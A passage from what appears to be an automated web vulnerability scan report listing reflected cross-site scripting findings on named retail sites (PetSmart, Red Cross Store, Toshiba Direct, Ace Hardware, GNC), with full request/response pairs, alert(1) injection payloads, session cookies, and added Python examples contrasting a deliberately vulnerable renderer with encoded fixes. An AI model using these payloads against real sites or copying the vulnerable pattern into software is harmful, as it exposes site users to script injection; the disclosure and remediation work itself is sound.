Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&rdir=1A25e8c--><script>alert(1)</script>dc42a180bb -->
...[SNIP]...

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 105bc--><script>alert(1)</script>2e44051ff6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:19:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<!-- === Request Query String: isInSecureMode=true&pageType=Checkout&process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 -->
...[SNIP]...
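Findings 5.64 to 5.68 all reduce to the same rendering bug: the raw query string is concatenated into a diagnostic HTML comment. The following is an added example written for this report, not code from the scanner or from the sites tested. It reproduces that comment with the 5.64 payload, shows a hardened rendering, and uses Python's html.parser to count how many <script> tags a browser-style tokenizer sees as live markup in each case. The render_* function names and the exact comment template are assumptions modelled on the response snippets above.

```python
import html
from html.parser import HTMLParser

# Payload exactly as submitted in finding 5.64 (the request's query string).
PAYLOAD_QS = "c5205--><script>alert(1)</script>bb446d17c91=1"


def render_debug_comment_vulnerable(query_string: str) -> str:
    """Reproduces the pattern in the responses above: the raw query string is
    concatenated into a diagnostic comment. Deliberately left vulnerable."""
    return f"<!-- === Request Query String: {query_string} -->"


def render_debug_comment_hardened(query_string: str) -> str:
    """Same comment with '<', '>' and '&' replaced by character references.
    References are not decoded inside a comment, so neither '-->' nor the
    HTML5 '--!>' terminator can be formed from user data. (Not emitting the
    request at all in production markup is the better fix.)"""
    return f"<!-- === Request Query String: {html.escape(query_string, quote=False)} -->"


class LiveScriptCounter(HTMLParser):
    """Counts <script> start tags the tokenizer sees as markup. Anything that
    stayed inside the comment is delivered to handle_comment instead."""

    def __init__(self) -> None:
        super().__init__()
        self.live_scripts = 0
        self.comments: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.live_scripts += 1

    def handle_comment(self, data):
        self.comments.append(data)


def count_live_scripts(markup: str) -> int:
    """Number of <script> tags a browser would execute in 'markup'."""
    parser = LiveScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.live_scripts


if __name__ == "__main__":
    for label, render in (("vulnerable", render_debug_comment_vulnerable),
                          ("hardened", render_debug_comment_hardened)):
        markup = render(PAYLOAD_QS)
        print(f"{label}: {count_live_scripts(markup)} live <script> tag(s) in {markup}")
```

With the vulnerable renderer the parser reports one live script tag and a comment that ends at "c5205"; with the hardened renderer the whole payload stays inside a single comment. The same check works on a captured response body, which makes it a quick way to confirm a fix after deployment.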

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /Shopper/Product.aspx

Issue detail

The value of the UniqueItemId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b89"style%3d"x%3aexpression(alert(1))"588742d80ce was submitted in the UniqueItemId parameter. This input was echoed as 97b89"style="x:expression(alert(1))"588742d80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers; that limitation belongs to the payload, not to the flaw. The underlying defect is that a double quote in UniqueItemId terminates the href value, so further attributes can be appended to the tag. A value placed in a URL that is itself placed in an attribute needs both URL-encoding and HTML attribute-encoding.

Request

GET /Shopper/Product.aspx?UniqueItemId=46497b89"style%3d"x%3aexpression(alert(1))"588742d80ce HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:24:30 GMT
Content-Length: 57128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<a href="http://www.redcrossstore.org/Shopper/Product.aspx?UniqueItemId=46497b89"style="x:expression(alert(1))"588742d80ce" class="breadcrumbs">
...[SNIP]...

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d835f'-alert(1)-'82064d64928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the raw query string is placed inside a single-quoted literal passed to updateFilters and updateResults, so a single quote in any parameter name or value ends the literal. Where the data must be echoed, every character outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed in the literal; escaping quotes alone is insufficient, because the HTML parser ends the script block at a </script> sequence regardless of JavaScript quoting.

Request

GET /td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 297415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
ults('searchResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_Use
...[SNIP]...

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc89'-alert(1)-'b678a22fbfb was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 296785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
hResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&targ
...[SNIP]...
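Findings 5.70 and 5.71 both place the request's query string inside a single-quoted JavaScript literal. The following is an added example for this report, not code from the scanner or from toshibadirect.com: it reproduces the updateFilters call with the 5.70 payload, applies the \xHH / \uHHHH encoding described in the remediation, and runs a minimal JavaScript-style tokenizer over both renderings to list any code that escaped the literal. The render_* and tokenizer functions are assumptions modelled on the response snippet above.

```python
# Payload as submitted in finding 5.70, and the query string the page echoed it in.
PAYLOAD = "d835f'-alert(1)-'82064d64928"
QUERY_STRING = f"{PAYLOAD}=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to"


def js_string_encode(value: str) -> str:
    """Encode for a JavaScript string literal: every character that is not an
    ASCII alphanumeric becomes \\xHH (or \\uHHHH above U+00FF). This covers
    both quote styles, backslash and newlines, and also '<' and '/', so a
    '</script>' inside the data cannot end the enclosing script block."""
    out = []
    for ch in value:
        cp = ord(ch)
        if cp < 128 and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def render_update_call_vulnerable(qs: str) -> str:
    # Pattern from the laptops.to response: raw query string inside a '...' literal.
    return (f"updateFilters('multiSelectFiltersAjax.jsp', '{qs}', "
            f"'filtersDiv', '4294967002 25 216 260', '0');")


def render_update_call_hardened(qs: str) -> str:
    return (f"updateFilters('multiSelectFiltersAjax.jsp', '{js_string_encode(qs)}', "
            f"'filtersDiv', '4294967002 25 216 260', '0');")


def tokenize_js_call(src: str) -> list[tuple[str, str]]:
    """Minimal tokenizer: yields ('str', decoded_value) for quoted literals,
    honouring \\xHH, \\uHHHH and single-character escapes, and ('code', text)
    for everything between them, the way the JS lexer would. Sufficient for a
    call whose arguments are all string literals."""
    tokens: list[tuple[str, str]] = []
    code: list[str] = []
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in "'\"":
            if code:
                tokens.append(("code", "".join(code)))
                code = []
            quote, buf = ch, []
            i += 1
            while i < n and src[i] != quote:
                if src[i] == "\\" and i + 1 < n:
                    esc = src[i + 1]
                    if esc == "x":
                        buf.append(chr(int(src[i + 2:i + 4], 16)))
                        i += 4
                    elif esc == "u":
                        buf.append(chr(int(src[i + 2:i + 6], 16)))
                        i += 6
                    else:
                        buf.append(esc)
                        i += 2
                else:
                    buf.append(src[i])
                    i += 1
            tokens.append(("str", "".join(buf)))
            i += 1  # skip the closing quote
        else:
            code.append(ch)
            i += 1
    if code:
        tokens.append(("code", "".join(code)))
    return tokens


def string_args(js_call: str) -> list[str]:
    """Decoded string arguments, in order."""
    return [text for kind, text in tokenize_js_call(js_call) if kind == "str"]


def foreign_code(js_call: str) -> list[str]:
    """Code tokens other than the call itself and argument separators: anything
    listed here is attacker-controlled JavaScript that escaped the literal."""
    return [text.strip(" ,();") for kind, text in tokenize_js_call(js_call)
            if kind == "code" and text.strip(" ,();") not in ("", "updateFilters")]


if __name__ == "__main__":
    print("vulnerable:", foreign_code(render_update_call_vulnerable(QUERY_STRING)))
    print("hardened:  ", foreign_code(render_update_call_hardened(QUERY_STRING)))
```

On the vulnerable rendering the tokenizer finds the literal ending at the payload's first quote and reports -alert(1)- as bare code; on the hardened rendering it finds no foreign code, and decoding the second argument gives back the original query string unchanged, so the page's own JavaScript still receives the value it expects.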

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cbd"><script>alert(1)</script>8eeef5c5ccb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. In this response the Referer is spliced, unencoded, into the u5 value of the DoubleClick Floodlight IFRAME URL, where the double quote terminates the SRC attribute; the value should be URL-encoded before it is concatenated into that URL, and the finished URL attribute-encoded when it is emitted.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:10 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:17 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb;ord=1;num=96780812?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>2efdd8e8816 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Referer: http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816;ord=1;num=81155747?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd5a"><script>alert(1)</script>3de0fcd614 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
